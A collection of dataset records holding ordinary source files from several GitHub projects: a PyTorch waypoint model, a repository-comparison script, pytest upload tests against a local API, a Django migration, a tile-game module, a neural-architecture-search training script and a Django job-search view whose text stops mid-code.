nn.Linear(floor(x_size/10), 4*4+4).double()\n # self.fc4 = nn.Linear(4*4+4, 4*4+4).double()\n # self.fc5 = nn.Linear(4*4+4, 4*4+4).double()\n # self.fc5.weight.data = torch.diag(torch.tensor([1] * 20)).double()\n \n self.fc1 = nn.Linear(x_size, 32, bias=True).double()\n self.fc2 = nn.Linear(32, 32, bias=False).double()\n # self.fc2.weight.data[:,:] = torch.tensor([0.38167919, 0.39101533, -0.44043292, 0.05524485, 1, 1, 1, 1]).view(8,1)\n # print(self.fc2.weight.data.shape)\n self.fc3 = nn.Linear(32,8, bias=True).double()\n # print(self.fc3.weight.data.shape)\n # self.fc1.weight.data = torch.diag(torch.tensor([1]*x_size)).double()\n # self.fc2.weight.data[0:4,0] = torch.tensor([0]*4).double()\n # self.fc2.weight.data[4:,0] = torch.tensor([1]*4).double()\n # self.fc2.weight.data[4:,:] = torch.diag(torch.tensor([1]*4)).double()\n self.fc3.weight.data[:,4:] *= 10\n self.optimizer = optim.Adam(self.parameters(), lr=self.alpha)\n \n def forward(self, x):\n # x = F.relu(self.conv1(x.double()))\n # x = F.relu(self.conv2(x))\n # x = F.relu(self.conv3(x))\n # x = x.view(-1, self.num_flat_features(x))\n # x = F.relu(self.fc1(x))\n # x = F.relu(self.fc2(x))\n # x = F.relu(self.fc3(x))\n # x = self.fc4(x)\n # x[:,4:] = torch.abs(x[:,4:].clone())\n # y = self.fc5(x)\n # y[:,4:] = torch.abs(y[:,4:].clone())\n # x = x[:,0,:]\n # x = F.relu(self.fc1(x))\n # print(x.shape)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n y = self.fc3(x)\n # y = self.fc2(x)\n return y\n \n def loss(self, y, delta, P):\n total = torch.tensor([0])\n mu = y[:,0:4]\n #mu.register_hook(lambda grad: print(\"gradient:\"+str(grad)))\n dmu = (P - mu).view(y.shape[0], 4, 1)\n dmut = dmu.permute(0,2,1)\n dot = torch.bmm(dmut, dmu).view(y.shape[0])/2\n #print(\"dot product:\")\n print(dot)\n weight_dot = delta*dot\n #print(\"weighted:\")\n #print(weight_dot)\n total = weight_dot.sum()/y.shape[0]\n # print(total)\n return total\n for i in range(y.shape[0]):\n mu = y[i,0:4].clone().view(4,1)\n A = y[i,4:].clone().view(4,4)\n p = P[i,:].clone().view(4,1)\n #S = torch.mm(A, torch.t(A))\n S = torch.diag(torch.tensor([0.001]*4)).double()\n Sinv = torch.inverse(S)\n dmu = p.clone() - mu.clone()\n dot = torch.mm(torch.mm(torch.t(dmu),Sinv),dmu).clone()\n # log = torch.log(torch.det(S))\n log = 0\n total = total.clone() + delta[i]*(log + dot.clone())/2\n #print(total)\n return total/y.shape[0]\n \n def update(self,deltas,P,state):\n self.optimizer.zero_grad()\n \n x = torch.from_numpy(state).double()\n y = self.forward(x)\n mu = y[:,0:4]\n sig = y[:,4:]\n S = torch.diag_embed(torch.mul(sig,sig))\n Sinv = torch.inverse(S)\n P = torch.from_numpy(P)\n dmu = (mu-P).view(x.shape[0], 1, 4)\n # print(Sinv.shape)\n # print(dmu.shape)\n Sinvdmu = torch.bmm(Sinv, dmu.permute(0,2,1))\n # Sinvdmu = dmu.permute(0,2,1)\n dotprod = torch.bmm(dmu, Sinvdmu).view(x.shape[0])\n det = torch.log(torch.det(S))\n detpdotprod = -(dotprod + det)/2\n weighted = detpdotprod*torch.from_numpy(deltas).view(x.shape[0])\n loss = -weighted.sum()/x.shape[0]\n # print(loss)\n # print(detpdotprod)\n loss.backward()\n # print(self.fc2.weight.data)\n # print(loss)\n # dw = self.alpha*torch.mm(torch.mm(y-P, subgrad),x.t())/x.shape[1]\n # dw = torch.mm(torch.mm(y-P, subgrad),x.t())/x.shape[1]\n # print(dw)\n # print(dw)\n # self.fc2.weight.data += dw\n # det.register_hook(lambda grad: print(grad))\n self.fc2.weight.register_hook(lambda grad: grad.clamp_(-self.clamp,self.clamp))\n # self.fc2.weight.register_hook(lambda grad: print(grad))\n self.optimizer.step()\n # 
print(self.fc2.weight.grad)\n \n return None\n \n def num_flat_features(self, x):\n size = x.size()[1:] # all dimensions except the batch dimension\n num_features = 1\n for s in size:\n num_features *= s\n return num_features\n\n def __call__(self,s):\n x = torch.from_numpy(s).double()\n y = self.forward(x.unsqueeze(0))\n mu = y[:,0:4]\n sig = y[:,4:]\n S = torch.diag_embed(torch.mul(sig,sig))\n # S = torch.from_numpy(np.identity(4))\n return mu.detach().numpy(), S.detach().numpy()","repo_name":"ut-amrl/WaypointLearning","sub_path":"WaypointDistributionNN.py","file_name":"WaypointDistributionNN.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22928502316","text":"# -*- coding: utf-8 -*-\n\n\n\"\"\"\n如何对比多个库\n 用哪些参考数值\n 生态值\n 社区,根据fork值来判断\n star\n fork\n 如何获取数据\n github api\n\n 如何查询数据\n input模拟查询\n\n\n\"\"\"\nimport requests\n\n\n# get names\ndef get_names():\n print(\"输入库的名字以空格空开\")\n names = input()\n return names.split(' ')\n\n\ndef check_repos(names):\n api_rep = \"https://api.github.com/search/repositories?q=\"\n ecosys_api = \"https://api.github.com/search/repositories?q=topic:\"\n for name in names:\n res = requests.get(api_rep+name).json()['items'][0]\n stars = res['stargazers_count']\n forks = res['forks_count']\n\n ecosys_info = requests.get(ecosys_api+name).json()['total_count']\n print(name)\n print('strars:'+str(stars))\n print('forks:'+str(forks))\n print('ecosys_info:'+ str(ecosys_info))\n print('--------------')\n\n\nnames = get_names()\ncheck_repos(names)","repo_name":"rwdxll/study","sub_path":"mugglecode/contrast_lib.py","file_name":"contrast_lib.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34103717180","text":"import json\nimport os\nfrom subprocess import PIPE, Popen\nfrom typing import List\n\nimport pytest\n\n\n\"\"\"\nFor all tests user string must exist with API key of stringstring\n\"\"\"\n\n\nasync def add_test(url: str, images: List[str], permission: str) -> None:\n \"\"\"\n all of the mock images are jpeg\n \"\"\"\n # os.popen opens a pipe in the command line and is useful to store the result of the command\n curl_base = f\"\"\"\n curl -X 'POST' \\\n '{url}' \\\n -H 'accept: application/json' \\\n -H 'Content-Type: multipart/form-data' \\\n \"\"\"\n\n for image in images:\n curl_base += f\" -F 'images_upload=@mock-data/{image};type=image/jpeg'\"\n print(curl_base)\n p = Popen(curl_base, shell=True, stdout=PIPE, stderr=PIPE)\n stdout, stderr = p.communicate()\n assert 'images_uploaded' in json.loads(\n stdout) and f'total_{permission}' in json.loads(stdout)\n\n\n@pytest.mark.asyncio\nasync def test_add_single_private():\n await add_test(\"http://127.0.0.1:8000/add/private/?api_key=stringstring&t=string\",\n [\"test.jpg\"], \"private\")\n\n\n@pytest.mark.asyncio\nasync def test_add_bulk_public():\n await add_test(\"http://127.0.0.1:8000/add/public/?api_key=stringstring&t=string&t=string\",\n [\"test.jpg\", \"test1.jpg\"], \"public\")\n\n\n@pytest.mark.asyncio\nasync def test_upload_images_matches_not_t():\n p = Popen(\"\"\"\n curl -X 'POST' \\\n 'http://127.0.0.1:8000/add/private/?api_key=stringstring&t=string&t=string' \\\n -H 'accept: application/json' \\\n -H 'Content-Type: multipart/form-data' \\\n -F 'images_upload=@mock-data/test.jpg;type=image/jpeg'\n \"\"\", shell=True, stdout=PIPE, stderr=PIPE)\n stdout, stderr = p.communicate()\n # 
converting bytes of strings into JSON\n assert json.loads(stdout) == {\n \"detail\": \"Please make sure the number of images match with your specified image properties\"}\n\n\n@pytest.mark.asyncio\nasync def test_invalid_image():\n p = Popen(\"\"\"\n curl -X 'POST' \\\n 'http://127.0.0.1:8000/add/private/?api_key=stringstring&t=string' \\\n -H 'accept: application/json' \\\n -H 'Content-Type: multipart/form-data' \\\n -F 'images_upload=@mock-data/test.pdf;type=application/pdf'\n \"\"\", shell=True, stdout=PIPE, stderr=PIPE)\n stdout, stderr = p.communicate()\n # converting bytes of strings into JSON\n assert json.loads(stdout) == {\n \"detail\": \"Please make sure that your images have any extension of the following: png, jpeg\"}\n","repo_name":"Adib234/shopify-fall-2021","sub_path":"backend/app/tests/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70021482506","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('simple_budget', '0004_remove_budgetcategory_budget_amount'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='AccountType',\n fields=[\n ('account_type_id', models.AutoField(serialize=False, primary_key=True)),\n ('account_type', models.TextField()),\n ('ordering', models.PositiveIntegerField()),\n ],\n options={\n 'db_table': 'account_type',\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"buzz1274/simple_budget","sub_path":"simple_budget/migrations/0005_accounttype.py","file_name":"0005_accounttype.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"33995073462","text":"#!/usr/bin/python3\n# Austin McCowan\n# 12/11/2020\n''' Tile design and control file '''\n\n''' Use a dictionary to link information about a tile type to the tiles themselves, i.e just find the key (tile name), and\nthen find the index of the piece of information and done. Since all tile types will share the same format/order of information in their\nlists, this should not create problems.\n'''\n# Information may include: functionality, defense rating, movement cost...\n# For defense rating, each star grants a 10% defense buff. to a max of 40%!\n# information format: Functionality, defense rating, movement costs: foot, tires, tread (air isnt needed as its always 1)\nglobal tiletypes\ntiletypes = {\n \"grass\":[False, 1, 1, 2, 2], \n \"road\":[False, 0, 1, 1, 1], \n \"factory\":[True, 3, 2, 2, 2],\n \"water\":[False, 0, 100, 100, 100],\n \"mountain\":[False, 4, 3, 100, 100],\n \"city\":[True, 3, 2, 2, 2],\n \"forest\":[False, 2, 2, 3, 3]\n}\n\nclass TileObject(object):\n # Holds tile positions (i.e 1:(1,2,1,4), 2:(2,2,1,4)...) 
Might move to Data class in maintester\n tiles = {}\n\n def __init__(self, tile_id, pos_x=0, pos_y=0, color=None, occupied=False):\n # Set up base stats for tiles\n # Decided to make move_cost a dictionary as to reduce variable count\n self.move_cost = {\"foot\": None,\n \"tires\": None,\n \"tread\": None, \n \"air\": 1}\n self.tile_id = tile_id \n self.pos_x = pos_x \n self.pos_y = pos_y\n self.defense = 0\n # These parameters / variables / stats are set to none as they are not required for each tile type.\n self.functionality = False # May actually remove functionality in future, as it is redundant when I can just check the reader. Although its simpler to type this.\n self.usable = None # Used when a tile is a factory, refresh on turn end, disable when factory is used. Cannot be used when not captured.\n self.health = None # Enabled when functionality exists. It allows infantry to capture (Should be set to 20, subtract unit health from it when being captured. Revert when unit stops)\n self.color = color # When captured (if having functionality) changes what color it is based on capturing unit.\n\n # Start setting up functionality, tiles with functionality will bring in income and can be captured.\n reader = self.tile_id.split(\"#\")\n if reader[0] not in tiletypes:\n raise Exception('Invalid tile type detected')\n if reader[0] in [\"city\", \"factory\"]:\n self.functionality = True\n self.health = 20 # If a tile has functionality, it can be captured. When it reaches 0, it will convert to the team color that captured it.\n\n # Will enable the usable variable if functionality exists and the tile is a factory\n if (self.functionality != False) and (reader[0] == \"factory\") and (self.color != None):\n self.usable = True\n\n # Sets movement costs\n self.move_cost[\"foot\"] = tiletypes[reader[0]][2]\n self.move_cost[\"tires\"] = tiletypes[reader[0]][3]\n self.move_cost[\"tread\"] = tiletypes[reader[0]][4]\n self.defense = tiletypes[reader[0]][1]\n \ndef tileCR8(tile_id, tile_list, posx, posy, color=None, occupied=False):\n tile_reader = tile_id.split(\"#\")\n if tile_reader[0] not in list(tiletypes.keys()):\n raise Exception(\"Error: Incompatible tile type attempted to be used\")\n else:\n tile_list.append(TileObject(tile_id, posx, posy, color, occupied))","repo_name":"AustinMcCowan/strategy-TBT","sub_path":"tiles.py","file_name":"tiles.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"588418074","text":"import os\nimport sys\nimport datetime\nimport torch\nimport numpy as np\nimport torch.nn as nn\n\nimport _init_paths\n\n# import timm packages\nfrom timm.utils import CheckpointSaver, update_summary\nfrom timm.loss import LabelSmoothingCrossEntropy\nfrom timm.data import Dataset, create_loader\nfrom timm.models import resume_checkpoint\n\n# import apex as distributed package otherwise we use torch.nn.parallel.distributed as distributed package\ntry:\n from apex.parallel import DistributedDataParallel as DDP\n from apex.parallel import convert_syncbn_model\n USE_APEX = True\nexcept ImportError:\n from torch.nn.parallel import DistributedDataParallel as DDP\n USE_APEX = False\n\n# import models and training functions\nfrom lib.utils.flops_table import FlopsEst\nfrom lib.core.train import train_epoch, validate\nfrom lib.models.structures.supernet import gen_supernet\nfrom lib.models.PrioritizedBoard import PrioritizedBoard\nfrom lib.models.MetaMatchingNetwork import 
MetaMatchingNetwork\nfrom lib.config import DEFAULT_CROP_PCT, IMAGENET_DEFAULT_STD, IMAGENET_DEFAULT_MEAN\nfrom lib.utils.util import parse_config_args, get_logger, \\\n create_optimizer_supernet, create_supernet_scheduler\n\n\ndef main():\n args, cfg = parse_config_args('super net training')\n\n # resolve logging\n output_dir = os.path.join(cfg.SAVE_PATH,\n \"{}-{}\".format(datetime.date.today().strftime('%m%d'),\n cfg.MODEL))\n\n if args.local_rank == 0:\n logger = get_logger(os.path.join(output_dir, \"train.log\"))\n else:\n logger = None\n\n # initialize distributed parameters\n torch.cuda.set_device(args.local_rank)\n torch.distributed.init_process_group(backend='nccl', init_method='env://')\n if args.local_rank == 0:\n logger.info(\n 'Training on Process %d with %d GPUs.',\n args.local_rank, cfg.NUM_GPU)\n\n # fix random seeds\n torch.manual_seed(cfg.SEED)\n torch.cuda.manual_seed_all(cfg.SEED)\n np.random.seed(cfg.SEED)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n # generate supernet\n model, sta_num, resolution = gen_supernet(\n flops_minimum=cfg.SUPERNET.FLOPS_MINIMUM,\n flops_maximum=cfg.SUPERNET.FLOPS_MAXIMUM,\n num_classes=cfg.DATASET.NUM_CLASSES,\n drop_rate=cfg.NET.DROPOUT_RATE,\n global_pool=cfg.NET.GP,\n resunit=cfg.SUPERNET.RESUNIT,\n dil_conv=cfg.SUPERNET.DIL_CONV,\n slice=cfg.SUPERNET.SLICE,\n verbose=cfg.VERBOSE,\n logger=logger)\n\n # initialize meta matching networks\n MetaMN = MetaMatchingNetwork(cfg)\n\n # number of choice blocks in supernet\n choice_num = len(model.blocks[1][0])\n if args.local_rank == 0:\n logger.info('Supernet created, param count: %d', (\n sum([m.numel() for m in model.parameters()])))\n logger.info('resolution: %d', (resolution))\n logger.info('choice number: %d', (choice_num))\n\n #initialize prioritized board\n prioritized_board = PrioritizedBoard(cfg, CHOICE_NUM=choice_num, sta_num=sta_num)\n\n # initialize flops look-up table\n model_est = FlopsEst(model)\n\n # optionally resume from a checkpoint\n optimizer_state = None\n resume_epoch = None\n if cfg.AUTO_RESUME:\n optimizer_state, resume_epoch = resume_checkpoint(\n model, cfg.RESUME_PATH)\n\n # create optimizer and resume from checkpoint\n optimizer = create_optimizer_supernet(cfg, model, USE_APEX)\n if optimizer_state is not None:\n optimizer.load_state_dict(optimizer_state['optimizer'])\n model = model.cuda()\n\n # convert model to distributed mode\n if cfg.BATCHNORM.SYNC_BN:\n try:\n if USE_APEX:\n model = convert_syncbn_model(model)\n else:\n model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model)\n if args.local_rank == 0:\n logger.info('Converted model to use Synchronized BatchNorm.')\n except Exception as exception:\n logger.info(\n 'Failed to enable Synchronized BatchNorm. '\n 'Install Apex or Torch >= 1.1 with Exception %s', exception)\n if USE_APEX:\n model = DDP(model, delay_allreduce=True)\n else:\n if args.local_rank == 0:\n logger.info(\n \"Using torch DistributedDataParallel. 
Install NVIDIA Apex for Apex DDP.\")\n # can use device str in Torch >= 1.1\n model = DDP(model, device_ids=[args.local_rank])\n\n # create learning rate scheduler\n lr_scheduler, num_epochs = create_supernet_scheduler(cfg, optimizer)\n\n start_epoch = resume_epoch if resume_epoch is not None else 0\n if start_epoch > 0:\n lr_scheduler.step(start_epoch)\n\n if args.local_rank == 0:\n logger.info('Scheduled epochs: %d', num_epochs)\n\n # imagenet train dataset\n train_dir = os.path.join(cfg.DATA_DIR, 'train')\n if not os.path.exists(train_dir):\n logger.info('Training folder does not exist at: %s', train_dir)\n sys.exit()\n\n dataset_train = Dataset(train_dir)\n loader_train = create_loader(\n dataset_train,\n input_size=(3, cfg.DATASET.IMAGE_SIZE, cfg.DATASET.IMAGE_SIZE),\n batch_size=cfg.DATASET.BATCH_SIZE,\n is_training=True,\n use_prefetcher=True,\n re_prob=cfg.AUGMENTATION.RE_PROB,\n re_mode=cfg.AUGMENTATION.RE_MODE,\n color_jitter=cfg.AUGMENTATION.COLOR_JITTER,\n interpolation='random',\n num_workers=cfg.WORKERS,\n distributed=True,\n collate_fn=None,\n crop_pct=DEFAULT_CROP_PCT,\n mean=IMAGENET_DEFAULT_MEAN,\n std=IMAGENET_DEFAULT_STD\n )\n\n # imagenet validation dataset\n eval_dir = os.path.join(cfg.DATA_DIR, 'val')\n if not os.path.isdir(eval_dir):\n logger.info('Validation folder does not exist at: %s', eval_dir)\n sys.exit()\n dataset_eval = Dataset(eval_dir)\n loader_eval = create_loader(\n dataset_eval,\n input_size=(3, cfg.DATASET.IMAGE_SIZE, cfg.DATASET.IMAGE_SIZE),\n batch_size=4 * cfg.DATASET.BATCH_SIZE,\n is_training=False,\n use_prefetcher=True,\n num_workers=cfg.WORKERS,\n distributed=True,\n crop_pct=DEFAULT_CROP_PCT,\n mean=IMAGENET_DEFAULT_MEAN,\n std=IMAGENET_DEFAULT_STD,\n interpolation=cfg.DATASET.INTERPOLATION\n )\n\n # whether to use label smoothing\n if cfg.AUGMENTATION.SMOOTHING > 0.:\n train_loss_fn = LabelSmoothingCrossEntropy(\n smoothing=cfg.AUGMENTATION.SMOOTHING).cuda()\n validate_loss_fn = nn.CrossEntropyLoss().cuda()\n else:\n train_loss_fn = nn.CrossEntropyLoss().cuda()\n validate_loss_fn = train_loss_fn\n\n # initialize training parameters\n eval_metric = cfg.EVAL_METRICS\n best_metric, best_epoch, saver, best_children_pool = None, None, None, []\n if args.local_rank == 0:\n decreasing = True if eval_metric == 'loss' else False\n saver = CheckpointSaver(\n checkpoint_dir=output_dir,\n decreasing=decreasing)\n\n # training scheme\n try:\n for epoch in range(start_epoch, num_epochs):\n loader_train.sampler.set_epoch(epoch)\n\n # train one epoch\n train_metrics = train_epoch(epoch, model, loader_train, optimizer,\n train_loss_fn, prioritized_board, MetaMN, cfg,\n lr_scheduler=lr_scheduler, saver=saver,\n output_dir=output_dir, logger=logger,\n est=model_est, local_rank=args.local_rank)\n\n # evaluate one epoch\n eval_metrics = validate(model, loader_eval, validate_loss_fn,\n prioritized_board, cfg,\n local_rank=args.local_rank, logger=logger)\n\n update_summary(epoch, train_metrics, eval_metrics, os.path.join(\n output_dir, 'summary.csv'), write_header=best_metric is None)\n\n if saver is not None:\n # save proper checkpoint with eval metric\n save_metric = eval_metrics[eval_metric]\n best_metric, best_epoch = saver.save_checkpoint(\n model, optimizer, cfg,\n epoch=epoch, metric=save_metric)\n\n except KeyboardInterrupt:\n pass\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"microsoft/Cream","sub_path":"Cream/tools/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8464,"program_lang":"python","lang":"en","doc_type":"code","stars":1370,"dataset":"github-code","pt":"81"} +{"seq_id":"73573840586","text":"# -*- coding: utf-8 -*-\nfrom operator import attrgetter\nfrom typing import Dict, Any, Union, ContextManager\n\nfrom django.urls import reverse\nfrom django.contrib import messages\nfrom django.db.models.functions import Concat\nfrom django.utils.translation import gettext_lazy as _\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom django.contrib.auth.forms import PasswordChangeForm\nfrom django.db import transaction\nfrom django.db.models import Q, Value, Count\nfrom django.http import HttpResponseRedirect, HttpResponse, JsonResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.template.loader import render_to_string\nfrom django.template import RequestContext\nfrom django.core import serializers\nimport string\nfrom random import choice\nimport json\n\nfrom django.views.decorators.http import require_POST\n\nfrom sva import mensagens\nfrom .models import *\nfrom .forms import *\nfrom datetime import datetime\n\n\ndef is_admin(user):\n if user.is_superuser:\n return True\n if user.groups.filter(name='Administrador').exists():\n return True\n if user.groups.filter(name='Setor de Estágios').exists():\n return True\n return False\n\n\n# Create your views here.\n\n\n@login_required\ndef home(request):\n return render(request, 'sva/base.html')\n\n\ndef formulario_contato(request):\n form = FormularioContato()\n return render(request, 'sva/contato.html', {'form': form})\n\n\n###############################################################################\n# VAGAS #\n###############################################################################\n\n@login_required\ndef pesquisar_vaga(request):\n\n def verificaAreasAtuacao(vaga, nome_area):\n areas_vaga = AreaAtuacao.objects.filter(vagas=vaga)\n for area in areas_vaga:\n if nome_area in area.nome:\n return True\n return False\n\n def verificaAreasAtuacaoByID(vaga, id_area):\n try:\n AreaAtuacao.objects.get(vagas=vaga, id=id_area)\n return True\n except:\n return False\n\n def verificaCursos(vaga, nome_curso):\n cursos_vaga = Curso.objects.filter(vagas_atribuidas=vaga)\n for curso in cursos_vaga:\n if nome_curso in curso.nome or nome_curso in curso.sigla:\n #nome_curso in curso.get_nivel_ensino_display()\n return True\n return False\n\n def verificaCursoByID(vaga, id_curso):\n try:\n Curso.objects.get(vagas_atribuidas=vaga, id=id_curso)\n return True\n except:\n if Curso.objects.filter(vagas_atribuidas=vaga).count() == 0: #OFERTADA A TODOS OS CURSOS\n return True\n else:\n return False\n\n def verificaCursoByNivel(vaga, nivel_ensino):\n if Curso.objects.filter(vagas_atribuidas=vaga).count() == 0: #OFERTADA A TODOS OS CURSOS\n return True\n cursos_vaga = Curso.objects.filter(vagas_atribuidas=vaga)\n for curso in cursos_vaga:\n if nivel_ensino == curso.nivel_ensino:\n return True\n return False\n\n #Formulario base de pesquisa (trata querysets de area e curso somente, os outros campos sao colocados via template)\n form = FormularioPesquisarVagas(request.POST)\n #Armazena palavras chave pesquisadas\n busca = []\n #FORCA POST_INIT SIGNAL PARA ATUALIZAR SITUACAO DE VAGAS VENCIDAS\n updatedVaga = 
Vaga.objects.filter().first()\n\n #LISTA INICIAL DE OBJETOS DA PESQUISA\n vagas = Vaga.objects.filter(situacao=Vaga.ATIVA)\n\n #Form initial value\n initial = \"\"\n try:\n alunoRadio = Aluno.objects.get(user=request.user)\n if alunoRadio.curso.nivel_ensino == 1:\n radioInitial = 1\n elif alunoRadio.curso.nivel_ensino == 2:\n radioInitial = 2\n elif alunoRadio.curso.nivel_ensino == 3:\n radioInitial = 3\n elif alunoRadio.curso.nivel_ensino == 4:\n radioInitial = 4\n elif alunoRadio.curso.nivel_ensino == 5:\n radioInitial = 5\n else:\n radioInitial = 1\n if request.method != 'POST':\n vagasAux = []\n for vaga in vagas:\n radioInitialFlag = True\n if radioInitial == 1 and not verificaCursoByNivel(vaga, 1):\n radioInitialFlag = False\n if radioInitial == 2 and not verificaCursoByNivel(vaga, 2):\n radioInitialFlag = False\n if radioInitial == 3 and not verificaCursoByNivel(vaga, 3):\n radioInitialFlag = False\n if radioInitial == 4 and not verificaCursoByNivel(vaga, 4):\n radioInitialFlag = False\n if radioInitial == 5 and not verificaCursoByNivel(vaga, 5):\n radioInitialFlag = False\n if radioInitialFlag == True:\n vagasAux.append(vaga)\n vagas = vagasAux\n except:\n radioInitial = 0\n\n formRemake = False\n ordemRemake = 0\n superuserOptionRemake = 0\n salarioRemake = None\n minvalueRemake = 5\n maxvalueRemake = 45\n checkBoxRemake = []\n radioRemake = radioInitial\n avaliacaoRemake = 0\n filtroRemake = []\n textoRemake = []\n areaRemake = []\n cursoRemake = []\n filtrosPesquisa = []\n if request.user.is_authenticated():\n filtrosPesquisa = FiltroPesquisa.objects.filter(user=request.user)\n\n # DELETA FILTRO\n if request.method == 'POST' and request.POST['type'] == \"remove_filter\":\n filtroPesquisaRemove = FiltroPesquisa.objects.get(id=int(request.POST['filtro_remover']))\n filtroNomeRemove = filtroPesquisaRemove.nome\n Filtro.objects.filter(pesquisa=filtroPesquisaRemove).delete()\n filtroPesquisaRemove.filtros.clear()\n filtroPesquisaRemove.delete()\n messages.success(request, 'Filtro de pesquisa %s deletado com sucesso' % filtroNomeRemove, mensagens.MSG_SUCCESS)\n\n\n #SALVAR FILTRO\n if request.method == 'POST' and request.POST['type']==\"add_filter\":\n nome_filtro = request.POST['novo_filtro']\n if request.user.is_authenticated() and request.POST['novo_filtro'] is not None and request.POST['novo_filtro'] != \"\":\n countFiltros = FiltroPesquisa.objects.filter(user=request.user).count()\n if countFiltros == 5:\n messages.error(request, mensagens.ERRO_QUANT_MAX_FILTROS, mensagens.MSG_ERRO)\n elif FiltroPesquisa.objects.filter(user=request.user, nome=request.POST['novo_filtro']).count() > 0:\n messages.error(request, 'Um filtro com o nome %s já existe' % request.POST['novo_filtro'], mensagens.MSG_ERRO)\n else:\n novoFiltroPesquisa = FiltroPesquisa()\n novoFiltroPesquisa.user = request.user\n novoFiltroPesquisa.nome = nome_filtro\n novoFiltroPesquisa.ordenacao = int(request.POST.get('ordem'))\n if not is_admin(request.user):\n novoFiltroPesquisa.situacao = FiltroPesquisa.ATIVAS\n else:\n novoFiltroPesquisa.situacao = int(request.POST.get('superuser_option'))\n if request.POST.get('estagio') == \"on\":\n novoFiltroPesquisa.tipo_estagio = True\n else:\n novoFiltroPesquisa.tipo_estagio = False\n if request.POST.get('monitoria') == \"on\":\n novoFiltroPesquisa.tipo_monitoria = True\n else:\n novoFiltroPesquisa.tipo_monitoria = False\n if request.POST.get('ic') == \"on\":\n novoFiltroPesquisa.tipo_ic = True\n else:\n novoFiltroPesquisa.tipo_ic = False\n if request.POST.get('outros') == 
\"on\":\n novoFiltroPesquisa.tipo_outros = True\n else:\n novoFiltroPesquisa.tipo_outros = False\n if request.POST.get('radioNivel') is not None:\n novoFiltroPesquisa.nivel = int(request.POST.get('radioNivel'))\n else:\n novoFiltroPesquisa.nivel = FiltroPesquisa.NENHUM_SELECIONADO\n novoFiltroPesquisa.carga_horaria_minima = int(request.POST.get('min-value'))\n novoFiltroPesquisa.carga_horaria_maxima = int(request.POST.get('max-value'))\n if request.POST.get('salario') is not None and request.POST.get('salario') != \"\":\n novoFiltroPesquisa.salario = float(request.POST.get('salario'))\n else:\n novoFiltroPesquisa.salario = 0\n novoFiltroPesquisa.avaliacao = int(request.POST.get('avaliacao'))\n filtros = request.POST.getlist('filtro')\n textoFiltro = request.POST.getlist('texto')\n cursoFiltro = request.POST.getlist('curso')\n areaFiltro = request.POST.getlist('area')\n aux = 0\n filtrosAuxList = []\n errorOnLoop = False\n for filtro in filtros:\n novoFiltro = Filtro()\n novoFiltro.tipo = int(filtro)\n if textoFiltro[aux] == \"\" or textoFiltro[aux] is None:\n novoFiltro.texto = \"\"\n else:\n novoFiltro.texto = textoFiltro[aux]\n try:\n area = AreaAtuacao.objects.get(id=int(areaFiltro[aux]))\n novoFiltro.areas_atuacao = area\n curso = Curso.objects.get(id=int(cursoFiltro[aux]))\n novoFiltro.cursos = curso\n novoFiltro.save()\n filtrosAuxList.append(novoFiltro)\n except:\n errorOnLoop = True\n continue\n aux+=1\n if errorOnLoop is True:\n for filtro in filtrosAuxList:\n filtro.delete()\n messages.error(request, mensagens.ERRO_PROCESSAMENTO, mensagens.MSG_ERRO)\n else:\n novoFiltroPesquisa.save()\n for filtro in filtrosAuxList:\n novoFiltroPesquisa.filtros.add(filtro)\n messages.success(request, 'Filtro de pesquisa %s criado com sucesso' % nome_filtro, mensagens.MSG_SUCCESS)\n\n if request.method == 'POST' and form.is_valid():\n if request.POST['type'] == \"load_filter\":\n filtroPesquisaLoad = FiltroPesquisa.objects.get(user=request.user, id=int(request.POST['filtro_carregar']))\n formRemake = True\n ordemRemake = str(filtroPesquisaLoad.ordenacao)\n superuserOptionRemake = str(filtroPesquisaLoad.situacao)\n checkBoxRemake.append(\"on\") if filtroPesquisaLoad.tipo_estagio is True else checkBoxRemake.append(\"off\")\n checkBoxRemake.append(\"on\") if filtroPesquisaLoad.tipo_monitoria is True else checkBoxRemake.append(\"off\")\n checkBoxRemake.append(\"on\") if filtroPesquisaLoad.tipo_ic is True else checkBoxRemake.append(\"off\")\n checkBoxRemake.append(\"on\") if filtroPesquisaLoad.tipo_outros is True else checkBoxRemake.append(\"off\")\n radioRemake = filtroPesquisaLoad.nivel\n salarioRemake = str(filtroPesquisaLoad.salario)\n minvalueRemake = filtroPesquisaLoad.carga_horaria_minima\n maxvalueRemake = filtroPesquisaLoad.carga_horaria_maxima\n avaliacaoRemake = str(filtroPesquisaLoad.avaliacao)\n filtroLoad = Filtro.objects.filter(pesquisa=filtroPesquisaLoad)\n for filtro in filtroLoad:\n filtroRemake.append(str(filtro.tipo))\n textoRemake.append(filtro.texto) if filtro.texto is not None and filtro.texto != \"\" else textoRemake.append(\"\")\n cursoRemake.append(filtro.cursos.id)\n areaRemake.append(filtro.areas_atuacao.id)\n\n else:\n formRemake = True\n ordemRemake = request.POST.get('ordem')\n superuserOptionRemake = request.POST.get('superuser_option')\n checkBoxRemake.append(\"on\") if request.POST.get('estagio') == \"on\" else checkBoxRemake.append(\"off\")\n checkBoxRemake.append(\"on\") if request.POST.get('monitoria') == 